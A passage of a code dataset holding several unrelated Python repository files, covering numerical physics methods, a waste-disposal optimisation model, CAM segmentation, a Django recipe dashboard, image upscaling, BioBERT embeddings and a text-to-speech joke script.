0=no, 1=yes. What the number values for the metadata map to\n\n return metadata_df, identity_vars, metadata_array, metadata_fields, metadata_map\n\n\n","repo_name":"hclent/creole-dro","sub_path":"datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":22109,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"22"} +{"seq_id":"16021062145","text":"from cProfile import label\nimport numpy as np\nfrom scipy.signal import argrelextrema\nimport matplotlib.pyplot as plt\n\nfrom math import exp, log\nfrom re import I\n\n\ndef laplace(L, n, xb0, xb1, yb0, yb1, maxiter=50):\n dx = L / n\n dy = L / n\n\n # Solution done for a 2D grid\n u0 = [[0 for i in range(n + 1)] for j in range(n + 1)] # Initialization\n x = [i * dx for i in range(n + 1)]\n y = [j * dy for j in range(n + 1)]\n\n # Constant boundary conditions\n for i in range(n + 1):\n for j in range(n + 1):\n if i == 0:\n u0[i][j] = xb0\n elif i == n:\n u0[i][j] = xb1\n elif j == 0:\n u0[i][j] = yb0\n elif j == n:\n u0[i][j] = yb1\n\n # Jacobi method\n u = u0.copy()\n iter = 0\n while iter <= maxiter:\n for i in range(1, n):\n for j in range(1, n):\n u[i][j] = (\n 1 / 4 * (u0[i][j + 1] + u0[i][j - 1] + u0[i + 1][j] + u0[i - 1][j])\n )\n u0[i][j] = u[i][j]\n\n iter += 1\n\n return u, x, y\n\n\n# --------------------* Pseudorandom number generator *--------------------------\n\n\ndef mlcg(\n seed, # Starting seed for reproducibility\n a, # parameters for the generator\n m, # parameters for the generator\n num, # Number of random values\n):\n x = seed\n arrayOfRandomNumber = []\n for i in range(num):\n x = (a * x) % m\n arrayOfRandomNumber.append(x)\n\n return arrayOfRandomNumber\n\n\n# ---------------* Generate list of N random points between lims *---------------------\ndef monteCarlo(funtion, number):\n xRandomNumber = mlcg(234.34, 65, 1, number)\n\n summation = 0\n for i in xRandomNumber:\n summation += funtion(i)\n\n total = 1 / float(number) * summation\n\n return total\n\n\ndef gaussFunction(x):\n return exp(-(x**2))\n\n\ndef p(x, alpha):\n return alpha * exp(-x)\n\n\n# Without importance sampling\ntotalWithou = monteCarlo(gaussFunction, 10000)\n\n# With importance sampling\ndef g(x, alpha=1):\n return gaussFunction(-log(1 - x / alpha)) / p(x, alpha)\n\n\n# -------------------* function from lib becouse some problem with lib *-----------------------\ndef Schroed(\n y,\n r,\n V,\n E,\n):\n (psi, phi) = y\n dphidx = [phi, (V - E) * psi]\n return np.array(dphidx)\n\n\n# --------------------------* Runge-Kutta RK4 *---------------------\n\n\ndef rk4(\n function,\n psi0,\n x,\n V,\n E,\n):\n n = len(x)\n psi = np.array([psi0] * n)\n for i in range(n - 1):\n h = x[i + 1] - x[i]\n k1 = h * function(psi[i], x[i], V[i], E)\n k2 = h * function(psi[i] + 0.5 * k1, x[i] + 0.5 * h, V[i], E)\n k3 = h * function(psi[i] + 0.5 * k2, x[i] + 0.5 * h, V[i], E)\n k4 = h * function(psi[i] + k3, x[i + 1], V[i], E)\n psi[i + 1] = psi[i] + (k1 + 2.0 * (k2 + k3) + k4) / 6.0\n return psi\n\n\n# --------------------------* To count the number of nodes *---------------------\ndef countNodes(waveFunction):\n maxArray = argrelextrema(waveFunction, np.greater)[0]\n minArray = argrelextrema(waveFunction, np.less)[0]\n nodecounter = len(maxArray) + len(minArray)\n return nodecounter\n\n\ndef RefineEnergy(\n Ebot,\n Etop,\n Nodes,\n psi0,\n x,\n V,\n):\n tolerance = 1e-12\n ET = Etop\n EB = Ebot\n psi = [1]\n while abs(EB - ET) > tolerance or abs(psi[-1]) > 1e-3:\n initE = (ET + EB) / 2.0\n psi = rk4(Schroed, psi0, x, V, initE)[:, 0]\n nodesIst = len(np.where(np.diff(np.signbit(psi)))[0]) - 1\n if nodesIst > Nodes + 1:\n ET = initE\n continue\n if nodesIst < Nodes - 1:\n EB = initE\n continue\n if nodesIst % 2 == 0:\n if psi[len(psi) - 1] <= 0.0:\n ET = initE\n else:\n EB = initE\n elif nodesIst > 0:\n if psi[len(psi) - 1] <= 0.0:\n EB = initE\n else:\n ET = initE\n elif nodesIst < 0:\n EB = initE\n return (EB, ET)\n\n\ndef shotInfiniPotenWell(EInterval, nodes):\n psi_0 = 0.0\n phi_0 = 1.0\n psiInit = np.array([psi_0, phi_0])\n hMesh = 1.0 / 100.0\n xArrayIpw = np.arange(0.0, 1.0 + hMesh, hMesh)\n VIpw = np.zeros(len(xArrayIpw))\n (EBref, ETref) = RefineEnergy(\n EInterval[0],\n EInterval[1],\n nodes,\n psiInit,\n xArrayIpw,\n VIpw,\n )\n psi = rk4(Schroed, psiInit, xArrayIpw, VIpw, EBref)[:, 0]\n normal = max(psi)\n N = psi * (1 / normal)\n return (EBref, N, xArrayIpw)\n","repo_name":"shrimansoft/P452A3","sub_path":"lib.py","file_name":"lib.py","file_ext":"py","file_size_in_byte":4575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"71200481336","text":"from ortools.linear_solver import pywraplp\r\nfrom math import sin,cos\r\nimport networkx as nx\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\nPI = 3.14159\r\nclass Node:\r\n def __init__(self, node_id, pos:tuple, service_demand:list, capacity:list, fraction:list, solver, node_num):\r\n self.position = pos\r\n self.node_id = node_id\r\n self.service_demand = service_demand\r\n self.incinerator_fraction = fraction[0]\r\n self.recycling_fraction = fraction[1]\r\n self.composting_fraction = fraction[2]\r\n\r\n self.incinerator_capacity = capacity[0]\r\n self.recycling_capacity = capacity[1]\r\n self.composting_capacity = capacity[2]\r\n self.landfill_capacity = capacity[3]\r\n\r\n self.solver = solver\r\n self.presence_incinerator = self.solver.BoolVar(f\"{node_id}_presence_incinerator\")\r\n self.presence_recycling = self.solver.BoolVar(f\"{node_id}_presence_recycling\")\r\n self.presence_composting = self.solver.BoolVar(f\"{node_id}_presence_composting\")\r\n self.presence_landfill = self.solver.BoolVar(f\"{node_id}_presence_landfill\")\r\n\r\n # amount of waste processed in this node\r\n self.waste_incinerator = self.solver.IntVar(0,self.incinerator_capacity,f\"{node_id}_waste_incinerator\")\r\n self.waste_recycling = self.solver.IntVar(0,self.recycling_capacity,f\"{node_id}_waste_recycling\")\r\n self.waste_composting= self.solver.IntVar(0,self.composting_capacity,f\"{node_id}_waste_composting\")\r\n self.waste_landfill = self.solver.IntVar(0,self.landfill_capacity,f\"{node_id}_waste_landfill\")\r\n\r\n # variable of outflow waste\r\n self.user_outflow_incinerator = {}\r\n self.user_outflow_recycling = {}\r\n self.user_outflow_composting = {}\r\n self.incinerator_outflow_landfill = {}\r\n self.recycling_outflow_landfill = {}\r\n self.composting_outflow_landfill = {}\r\n self.user_outflow_landfill = {}\r\n\r\n for dest_id in range(node_num):\r\n self.user_outflow_incinerator[dest_id+1] = self.solver.IntVar(0, service_demand, f\"{node_id}_{dest_id}_user_outflow_incinerator\")\r\n self.user_outflow_recycling[dest_id+1] = self.solver.IntVar(0, service_demand, f\"{node_id}_{dest_id}_user_outflow_recycling\")\r\n self.user_outflow_composting[dest_id+1] = self.solver.IntVar(0, service_demand, f\"{node_id}_{dest_id}_user_outflow_composting\")\r\n self.incinerator_outflow_landfill[dest_id+1] = self.solver.IntVar(0, service_demand, f\"{node_id}_{dest_id}_incinerator_outflow_landfill\")\r\n self.recycling_outflow_landfill[dest_id+1] = self.solver.IntVar(0, service_demand, f\"{node_id}_{dest_id}_recycling_outflow_landfill\")\r\n self.composting_outflow_landfill[dest_id+1] = self.solver.IntVar(0, service_demand, f\"{node_id}_{dest_id}_composting_outflow_landfill\")\r\n self.user_outflow_landfill[dest_id+1] = self.solver.IntVar(0, service_demand, f\"{node_id}_{dest_id}_user_outflow_landfill\")\r\n\r\n # variable of inflow waste\r\n self.user_inflow_incinerator = {}\r\n self.user_inflow_recycling = {}\r\n self.user_inflow_composting = {}\r\n self.incinerator_inflow_landfill = {}\r\n self.recycling_inflow_landfill = {}\r\n self.composting_inflow_landfill = {}\r\n self.user_inflow_landfill = {}\r\n\r\n def add_constraints(self):\r\n # outflow = service demand\r\n self.solver.Add(sum(self.user_outflow_incinerator.values())+sum(self.user_outflow_recycling.values())\r\n +sum(self.user_outflow_composting.values())+sum(self.user_outflow_landfill.values()) == self.service_demand)\r\n # inflow = waste treated\r\n self.solver.Add(sum(self.user_inflow_composting.values()) == self.waste_composting)\r\n self.solver.Add(sum(self.user_inflow_recycling.values()) == self.waste_recycling)\r\n self.solver.Add(sum(self.user_inflow_incinerator.values()) == self.waste_incinerator)\r\n self.solver.Add(sum(self.user_inflow_landfill.values())+sum(self.incinerator_inflow_landfill.values())+sum(self.recycling_inflow_landfill.values())\r\n + sum(self.composting_inflow_landfill.values()) == self.waste_landfill)\r\n # waster treated <= presence * capacity\r\n self.solver.Add(self.waste_incinerator <= self.landfill_capacity*self.presence_incinerator)\r\n self.solver.Add(self.waste_recycling <= self.recycling_capacity*self.presence_recycling)\r\n self.solver.Add(self.waste_composting <= self.composting_capacity*self.presence_composting)\r\n self.solver.Add(self.waste_landfill <= self.landfill_capacity*self.presence_landfill)\r\n\r\n # process inflow * fraction = process outflow\r\n self.solver.Add(sum(self.user_inflow_incinerator.values())*self.incinerator_fraction == sum(self.incinerator_outflow_landfill.values()))\r\n self.solver.Add(sum(self.user_inflow_recycling.values())*self.recycling_fraction == sum(self.recycling_outflow_landfill.values()))\r\n self.solver.Add(sum(self.user_inflow_composting.values())*self.recycling_fraction == sum(self.composting_outflow_landfill.values()))\r\n\r\n # a node can only have one process plant\r\n self.solver.Add(self.presence_landfill+self.presence_composting+self.presence_recycling <= 1)\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n solver = pywraplp.Solver.CreateSolver(\"SAT\")\r\n # parameters to be identified\r\n node_num = 5\r\n node_positions = [(1+sin(0),1+cos(0)),(1+sin(2*PI/5),1+cos(2*PI/5)),(1+sin(2*PI/5*2),1+cos(2*PI/5)*2),(1+sin(2*PI/5*3),1+cos(2*PI/5*3)),(1+sin(2*PI/5*4),1+cos(2*PI/5*4))]\r\n service_demand = [6000, 6000, 6000, 6000, 6000]\r\n capacity = [[0, 0, 0, 0],[4500,2500,0,4500],[4500,2500,0,4500],[4500,2500,0,4500],[4500,2500,0,4500]]\r\n fraction = [0.1, 0.25, 0]\r\n # economic, landfill waste, environment impact\r\n objective_weights = [1, 1, 0]\r\n # incinerator, recycling, composting, landfill\r\n process_plant_fixed_cost = [30, 20, 25, 1]\r\n process_cost = np.array([1, 3, 2.5, 1])\r\n # transport cost matrix\r\n transport_cost_matrix = np.array([[0,3,3,5,7],\r\n [2,0,3,5,7],\r\n [5,8,0,2,4],\r\n [3,6,6,0,2],\r\n [3,6,6,8,0]]) * 0.001\r\n network = {}\r\n for i in range(node_num):\r\n network[i+1] = Node(i+1, node_positions[i], service_demand[i], capacity[i], fraction, solver, node_num)\r\n # network[i+1].add_constraints()\r\n for i in range(node_num):\r\n for j in range(node_num):\r\n network[i+1].user_inflow_incinerator[j+1] = network[j+1].user_outflow_incinerator[i+1]\r\n network[i+1].user_inflow_recycling[j+1] = network[j+1].user_outflow_recycling[i+1]\r\n network[i+1].user_inflow_composting[j+1] = network[j+1].user_outflow_composting[i+1]\r\n network[i+1].incinerator_inflow_landfill[j+1] = network[j+1].incinerator_outflow_landfill[i+1]\r\n network[i+1].recycling_inflow_landfill[j+1] = network[j+1].recycling_outflow_landfill[i+1]\r\n network[i+1].composting_inflow_landfill[j+1] = network[j+1].composting_outflow_landfill[i+1]\r\n network[i+1].user_inflow_landfill[j+1] = network[j+1].user_outflow_landfill[i+1]\r\n for i in range(node_num):\r\n network[i+1].add_constraints()\r\n # add objective\r\n objective=solver.Objective()\r\n for i in range(node_num):\r\n # objective 2 with weights\r\n objective.SetCoefficient(network[i+1].waste_landfill, 1*objective_weights[1]+process_cost[3]*objective_weights[0])\r\n # investment(fixed cost)\r\n objective.SetCoefficient(network[i+1].presence_incinerator, process_plant_fixed_cost[0] * objective_weights[0])\r\n objective.SetCoefficient(network[i+1].presence_recycling, process_plant_fixed_cost[1] * objective_weights[0])\r\n objective.SetCoefficient(network[i+1].presence_composting, process_plant_fixed_cost[2] * objective_weights[0])\r\n objective.SetCoefficient(network[i+1].presence_landfill, process_plant_fixed_cost[3] * objective_weights[0])\r\n # variable cost\r\n objective.SetCoefficient(network[i+1].waste_incinerator, process_cost[0] * objective_weights[0])\r\n objective.SetCoefficient(network[i+1].waste_recycling, process_cost[1] * objective_weights[0])\r\n objective.SetCoefficient(network[i+1].waste_composting, process_cost[2] * objective_weights[0])\r\n # objective.SetCoefficient(network[i+1].waste_landfill,process_cost[3] * objective_weights[0])\r\n # transportation cost\r\n for j in range(node_num):\r\n objective.SetCoefficient(network[i + 1].user_outflow_incinerator[j+1], transport_cost_matrix[i][j] * objective_weights[0])\r\n objective.SetCoefficient(network[i + 1].user_outflow_recycling[j+1], transport_cost_matrix[i][j] * objective_weights[0])\r\n objective.SetCoefficient(network[i + 1].user_outflow_composting[j+1], transport_cost_matrix[i][j] * objective_weights[0])\r\n objective.SetCoefficient(network[i + 1].user_outflow_landfill[j+1], transport_cost_matrix[i][j] * objective_weights[0])\r\n objective.SetCoefficient(network[i + 1].incinerator_outflow_landfill[j + 1], transport_cost_matrix[i][j] * objective_weights[0])\r\n objective.SetCoefficient(network[i + 1].recycling_outflow_landfill[j + 1], transport_cost_matrix[i][j] * objective_weights[0])\r\n objective.SetCoefficient(network[i + 1].composting_outflow_landfill[j + 1], transport_cost_matrix[i][j] * objective_weights[0])\r\n\r\n objective.SetMinimization()\r\n # objective.SetMaximization()\r\n status = solver.Solve()\r\n G = nx.DiGraph()\r\n subax = plt.subplot(4, 1, (1, 4))\r\n pos = {}\r\n labels = {}\r\n colors = {}\r\n if status == pywraplp.Solver.OPTIMAL:\r\n print('optimal!!')\r\n print(\"Objective value =\", solver.Objective().Value())\r\n\r\n else:\r\n print('The problem does not have an optimal solution.')\r\n\r\n print(\"Problem solved in %f milliseconds\" % solver.wall_time())\r\n print(\"Problem solved in %d iterations\" % solver.iterations())\r\n print(\"Problem solved in %d branch-and-bound nodes\" % solver.nodes())\r\n for i in range(node_num):\r\n node = network[i + 1]\r\n G.add_node(node.node_id)\r\n discription = f'{node.node_id}:'\r\n if node.presence_landfill.solution_value() > 0:\r\n discription += 'land_fill'\r\n if node.presence_incinerator.solution_value() > 0:\r\n discription += '\\nincinerator'\r\n if node.presence_recycling.solution_value() > 0:\r\n discription += '\\nrecycling'\r\n if node.presence_composting.solution_value() > 0:\r\n discription += '\\ncomposting'\r\n pos[node.node_id] = node.position\r\n labels[node.node_id] = discription\r\n print(f'node {i + 1} landfill waste amount: {network[i + 1].waste_landfill.solution_value()}')\r\n print(f'node {i + 1} incinerator waste amount: {network[i + 1].waste_incinerator.solution_value()}')\r\n print(f'node {i + 1} recycling waste amount: {network[i + 1].waste_recycling.solution_value()}')\r\n print(f'node {i + 1} composting waste amount: {network[i + 1].waste_composting.solution_value()}')\r\n for j in range(node_num):\r\n dest = network[j + 1]\r\n if node.user_outflow_incinerator[j + 1].solution_value() > 0:\r\n G.add_edge(node.node_id, dest.node_id, weight=node.user_outflow_incinerator[j + 1].solution_value(),\r\n type='incinerator')\r\n if node.user_outflow_recycling[j + 1].solution_value() > 0:\r\n G.add_edge(node.node_id, dest.node_id, weight=node.user_outflow_recycling[j + 1].solution_value(),\r\n type='recycling')\r\n if node.user_outflow_composting[j + 1].solution_value() > 0:\r\n G.add_edge(node.node_id, dest.node_id, weight=node.user_outflow_composting[j + 1].solution_value(),\r\n type='composting')\r\n landfill = node.incinerator_outflow_landfill[j + 1].solution_value() + node.recycling_outflow_landfill[\r\n j + 1].solution_value() + \\\r\n node.composting_outflow_landfill[j + 1].solution_value() + node.user_outflow_landfill[\r\n j + 1].solution_value()\r\n if landfill > 0:\r\n G.add_edge(node.node_id, dest.node_id, weight=landfill, type='landfill')\r\n nx.draw_networkx_nodes(G, pos)\r\n nx.draw_networkx_labels(G, pos, labels=labels)\r\n nx.draw_networkx_edges(G, pos, edge_color='red')\r\n plt.show()\r\n print(\"haha\")","repo_name":"Minefix049/Waste-Disposal-Optimization","sub_path":"wasteDisposal.py","file_name":"wasteDisposal.py","file_ext":"py","file_size_in_byte":12682,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"13761962308","text":"import torch\nimport tqdm\nimport os\nimport torch.nn.functional as F\nimport cv2\n\nfrom model_training.common.models import get_network\n\n\nclass ActivationExtractor:\n \"\"\"Extract activation maps from pretrained model\"\"\"\n\n def __init__(self, config, train_dl, val_dl, device):\n self.config = config\n self.train_dl = train_dl\n self.val_dl = val_dl\n self.device = device\n\n self.model = get_network(config[\"model\"])\n state_dict = torch.load(config[\"model\"][\"weights_path\"])\n self.model.load_state_dict(state_dict[\"model\"])\n self.model = self.model.to(device)\n self.model.eval()\n\n self.maps_weights = (\n self.model.linear.weight\n ) # shape: [num_classes, K] K - number of kernel filters\n self.interpolation_mode = config[\"interpolation\"]\n\n def extract(self):\n self._run(self.train_dl, prefix=\"train\")\n self._run(self.val_dl, prefix=\"val\")\n\n @torch.no_grad()\n def _run(self, dl, prefix=\"train\"):\n for X, y, image_names in tqdm.tqdm(dl):\n X, y = X.to(self.device), y.to(self.device)\n height, width = X.shape[2:]\n y_pred, maps = self.model(X, return_maps=True)\n if not os.path.exists(self.config[prefix][\"output_path\"]):\n os.makedirs(self.config[prefix][\"output_path\"])\n for name, activation_maps, classes in zip(image_names, maps, y):\n self._process_single_image(\n activation_maps, classes, name, (height, width), prefix=prefix\n )\n\n def _process_single_image(self, activation_maps, classes, name, size, prefix):\n \"\"\"\n Save segmentation map for single image\n Args:\n activation_maps (torch.tensor): activation of last conv layer [K, H_s, W_s]\n classes (torch.tensor): ground-truth labels for image [num_classes]\n name (str): name of segmap to save\n size (tuple(int, int)): size of segmap to save\n prefix (str): flag whether to save into train or val set\n \"\"\"\n\n maps_weights = self.maps_weights[classes == 1] # shape: [true_classes, K]\n seg_maps = torch.tensordot(\n maps_weights, activation_maps, dims=((1,), (0,))\n ) # shape: [true_classes, H_s, W_s]\n\n save_path = os.path.join(self.config[prefix][\"output_path\"], name + \".png\")\n seg_maps = F.interpolate(\n seg_maps[None], size, mode=self.interpolation_mode, align_corners=False\n )[0]\n\n class_labels = (\n torch.where(classes == 1)[0].type(torch.float32) + 1\n ) # e.g. [2, 7, 20]\n seg_maps_max, seg_maps_indices = seg_maps.max(dim=0)\n threshold = (seg_maps_max.max() - seg_maps_max.min()) * self.config[\n \"background_threshold\"\n ] + seg_maps_max.min()\n\n idx = seg_maps_max > threshold\n seg_maps_max[~idx] = 0\n seg_maps_max[idx] = class_labels[seg_maps_indices][idx]\n\n cv2.imwrite(save_path, seg_maps_max.type(torch.uint8).cpu().numpy())\n","repo_name":"ucuapps/WSMIS","sub_path":"inference/cam_generation/cam.py","file_name":"cam.py","file_ext":"py","file_size_in_byte":3060,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"22"} +{"seq_id":"24485859823","text":"import json\nimport pickle\nfrom typing import Any\n\nfrom bitarray import bitarray\n\nfrom .video_processor.camera_config import CameraConfig, camera_config\n\n\nclass GeospatialVideo:\n def __init__(\n self,\n video: \"str\",\n camera: \"list[CameraConfig] | str\",\n keep: \"bitarray | None\" = None,\n ) -> None:\n self.video = video\n if isinstance(camera, str):\n if camera.endswith(\".json\"):\n with open(camera, \"r\") as f:\n camera_configs = json.load(f)\n else:\n assert camera.endswith(\".camera.pkl\")\n with open(camera, \"rb\") as f:\n camera_configs = pickle.load(f)\n if isinstance(camera_configs, dict):\n camera_configs = camera_configs[\"frames\"]\n assert isinstance(camera_configs, list), camera_configs\n self.camera = [_camera_config(c) for c in camera_configs]\n else:\n self.camera = camera\n self.keep = keep\n\n\ndef _camera_config(c: \"Any\"):\n assert isinstance(c, (list, tuple)), c\n assert len(c) == 13, c\n c1, c2, c3, c4, c5, c6, c7, c8, c9, c10, c11, c12, c13 = c\n return camera_config(c1, c2, c3, c4, c5, c6, c7, c8, c9, c10, c11, c12, c13, 0)\n","repo_name":"apperception-db/spatialyze","sub_path":"spatialyze/geospatial_video.py","file_name":"geospatial_video.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"22"} +{"seq_id":"35478429151","text":"import argparse\nimport os\n\nroot_dir = os.path.dirname(os.path.realpath(__file__))\nservice_dir = os.path.join(root_dir, \"service\")\n\nrequirements = []\n\n\ndef create_service_directory() -> None:\n if not os.path.exists(service_dir):\n os.mkdir(service_dir)\n info(\"Creating Service Directory at: \" + service_dir)\n\n\ndef build_requirements() -> None:\n \"\"\"Build requirements.txt file for the service\"\"\"\n requirements_path = os.path.join(service_dir, \"requirements.txt\")\n if not os.path.exists(requirements_path):\n info(\"Creating requirements.txt file\")\n requirements_file = open(requirements_path, 'w')\n for requirement in requirements:\n if requirement[1] is None:\n requirements_file.write(requirement[0]+\"\\n\")\n else:\n requirements_file.write(requirement[0]+\" >= \"+requirement[1])\n requirements_file.close()\n\n\ndef add_requirement(requirement, version=None) -> None:\n if requirement is not None:\n requirements.append((requirement, version))\n\n\ndef info(message) -> None:\n log(message, 4)\n\n\ndef warn(message) -> None:\n log(message, 3)\n\n\ndef error(message) -> None:\n log(message, 2)\n\n\ndef log(message, level=4) -> None:\n if log_level >= level:\n print(message)\n\n\nif __name__ == \"__main__\":\n # change this to read from command line and default to 4\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '-l', '--log-level', dest=\"loglevel\", help=\"Set the log level. 4(default) print everything, 3 print warnings and errors, 2 print errors, 1 print nothing\", default=4, type=int, choices=[1, 2, 3, 4])\n args = parser.parse_args()\n log_level = args.loglevel\n print(args)\n print(log_level)\n create_service_directory()\n add_requirement(\"ariadne\")\n build_requirements()\n","repo_name":"jonschwartz/steffi","sub_path":"steffi.py","file_name":"steffi.py","file_ext":"py","file_size_in_byte":1799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"1663348370","text":"from recipes.models import Recipe\nfrom recipes.views import PAGES_TO_DISPLAY, RECIPES_PER_PAGE\nfrom utils.pagination import make_pagination\nfrom authors.forms.edit_recipe_form import RecipeEditForm\nfrom authors.forms.create_recipe_form import RecipeCreateForm\nfrom django.views import View\nfrom django.shortcuts import redirect, render, get_object_or_404\nfrom django.utils.translation import get_language\nfrom django.utils.text import slugify\nfrom django.contrib import messages\nfrom django.utils.decorators import method_decorator\nfrom django.contrib.auth.decorators import login_required\n\n\n@login_required(login_url='authors:login', redirect_field_name='next')\ndef dashboard_view(req):\n recipes = Recipe.objects.filter(\n user=req.user,\n is_published=False).order_by('-id')\n pagination = make_pagination(\n request=req,\n obj_list=recipes,\n obj_per_page=RECIPES_PER_PAGE,\n pages_to_display=PAGES_TO_DISPLAY,\n )\n return render(req, 'authors/pages/dashboardView.html', {\n 'recipes': pagination['page'],\n 'pagination_range': pagination['page_range'],\n 'search_bar': False,\n 'translation': get_language(),\n })\n\n\nclass DashboardRecipeView(View):\n def get_recipe(self, id):\n return get_object_or_404(\n Recipe,\n pk=id,\n user=self.request.user,\n is_published=False\n )\n\n def get_page(self, template, **kwargs):\n return render(\n self.request,\n template,\n {\n 'translation': get_language(),\n **kwargs,\n }\n )\n\n\n@method_decorator(\n login_required(redirect_field_name='next', login_url='authors:login'),\n name='dispatch'\n)\nclass DashboardRecipeEdit(DashboardRecipeView):\n def get(self, *args, **kwargs):\n recipe = self.get_recipe(kwargs.get('id'))\n form = RecipeEditForm(instance=recipe)\n return self.get_page(\n template='authors/pages/edit_recipeView.html',\n form=form,\n recipe=recipe,\n search_bar=False,\n title=f'{recipe.title} | '\n )\n\n def post(self, *args, **kwargs):\n recipe = self.get_recipe(kwargs.get('id'))\n form = RecipeEditForm(\n data=self.request.POST or None,\n files=self.request.FILES or None,\n instance=recipe\n )\n if form.is_valid():\n r = form.save(commit=False)\n r.user = self.request.user\n r.slug = slugify(r.title)\n r.is_published = False\n r.preparation_steps_is_html = False\n r.save()\n messages.success(self.request, 'Your recipe has been updated!')\n return redirect('authors:dashboard')\n return self.get_page(\n template='authors/pages/edit_recipeView.html',\n form=form,\n recipe=recipe,\n search_bar=False,\n title=f'{recipe.title} | '\n )\n\n\n@method_decorator(\n login_required(redirect_field_name='next', login_url='authors:login'),\n name='dispatch'\n)\nclass DashboardRecipeCreate(DashboardRecipeView):\n def get(self, *args, **kwargs):\n form = RecipeCreateForm(\n data=self.request.POST or None,\n files=self.request.FILES or None\n )\n return self.get_page(\n template='authors/pages/create_recipeView.html',\n form=form,\n title='Create a recipe | ',\n search_bar=False\n )\n\n def post(self, *args, **kwargs):\n form = RecipeCreateForm(\n data=self.request.POST or None,\n files=self.request.FILES or None\n )\n if form.is_valid():\n r = form.save(commit=False)\n r.user = self.request.user\n r.is_published = False\n r.preparation_steps_is_html = False\n r.save()\n messages.success(self.request, 'Your recipe has been created!')\n return redirect('authors:dashboard')\n return self.get_page(\n template='authors/pages/create_recipeView.html',\n form=form,\n title='Create a recipe | ',\n search_bar=False\n )\n\n\n@method_decorator(\n login_required(redirect_field_name='next', login_url='authors:login'),\n name='dispatch'\n)\nclass DashboardRecipeDelete(DashboardRecipeView):\n def post(self, *args, **kwargs):\n recipe = self.get_recipe(self.request.POST.get('recipe_id'))\n recipe.delete()\n messages.success(self.request, 'Your recipe has been deleted!')\n return redirect('authors:dashboard')\n","repo_name":"washingtonsilva1/recipes-django","sub_path":"authors/views/dashboard.py","file_name":"dashboard.py","file_ext":"py","file_size_in_byte":4633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"26369048117","text":"def X4Size(im,imF,step,factor,V,model,Image,ImageChops):\n # Size of the image in pixels (size of original image)\n # (This is not mandatory)\n width, height = im.size\n print(height)\n print(width)\n #Image de fond\n imM1 = Image.new(mode=\"RGBA\", size=(height*factor, width*factor),color=(0, 0, 0, 255))\n #B1\n for i_height in range(0, height-1, step):\n for i_width in range(0, width-1, step):\n print(\"B1 : \" + str(i_height)+\"x\"+str(i_width)) \n left = i_width\n top = i_height\n right = i_width+step\n bottom = i_height+step\n\n im1 = im.crop((left, top, right, bottom))\n\n sr_image = model.predict(im1)\n\n imM1.alpha_composite(sr_image.convert(\"RGBA\"), dest=(left*factor, top*factor))\n imM1 = imM1.convert(\"RGB\")\n return imM1\n","repo_name":"renaudfractale/MakeMaxiSizeImageByRealESRGAN","sub_path":"ModulePython/X4v0.py","file_name":"X4v0.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"72287165816","text":"''' \nProject: Explaining LSTM-CRF models based NER Systems\nVersion: 0.1\nAuthor: Akshat Gupta\n'''\n\n# !wget https://setup.johnsnowlabs.com/nlu/colab.sh -O - | bash\nimport nlu\nimport pandas as pd\nimport numpy as np\nfrom sklearn.manifold import TSNE\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n'''\nTo create BioBERT Embeddings\n'''\nclass BioBERTEmbedding():\n def __init__(self) -> None:\n pass\n\n def Get_BioBertEmbedding():\n df = pd.read_csv('../data/ner-disease/DatasetTrain.csv')\n\n pipe = nlu.load('biobert pos') # emotion\n df['text'] = df['Word']\n df_b = df[df['Tag'] == '|B-DISEASE\\n']\n df_i = df[df['Tag'] == '|I-DISEASE\\n']\n df_o = df[df['Tag'] == '|O\\n']\n\n df_b = df_b[:4000]\n df_i = df_i[:4000]\n df_o = df_o[:6000]\n\n df = pd.concat([df_b, df_o, df_i], ignore_index=True)\n predictions = pipe.predict(df[['text','Tag']].iloc[0:14000], output_level='token')\n\n # Make a matrix from the vectors in the np_array column via list comprehension\n mat = np.matrix([x for x in predictions.word_embedding_biobert])\n model = TSNE(n_components=2) #n_components means the lower dimension\n low_dim_data = model.fit_transform(mat)\n print('Lower dim data has shape',low_dim_data.shape)\n\n tsne_df = pd.DataFrame(low_dim_data, predictions.Tag)\n tsne_df.columns = ['x','y']\n ax = sns.scatterplot(data=tsne_df, x='x', y='y', hue=tsne_df.index)\n ax.set_title('T-SNE BIOBERT Embeddings based on LIME and GALE, colored by Named Entity')\n","repo_name":"Akshat4112/Interpreting-Bidirectional-CRF-LSTM-for-Disease-Entity-Recognition","sub_path":"code/BioBertEmbeddings.py","file_name":"BioBertEmbeddings.py","file_ext":"py","file_size_in_byte":1578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"1071865876","text":"\n# Import the google text to speech api and ability to open files\nfrom gtts import gTTS\nimport os, requests, json\n\n# get the joke\njokesite = requests.get(\"https://official-joke-api.appspot.com/random_joke\")\njoke = json.loads(jokesite.text)\n\n# Store the joke in a variable\nmytext = joke[\"setup\"] + joke[\"punchline\"]\n\n# send the options to the server and save\nmyobj = gTTS(text=mytext)\nmyobj.save(\"say.mp3\")\n \n# Playing the saved file\nos.system(\"open say.mp3\")\n\n\n\n\n\n","repo_name":"mejoe/py-gtts","sub_path":"sayjokes.py","file_name":"sayjokes.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"27263072481","text":"from charaname_dialogue_separator import CharanameDialogueSeparator\r\nfrom paragraph_separator import ParagraphSeparator\r\nfrom line_breaker import LineBreaker\r\n\r\n\r\ndef main():\r\n\r\n max_line_num = 3\r\n max_chara_num_in_line = 32\r\n appropriate_max_chara_num_in_line = 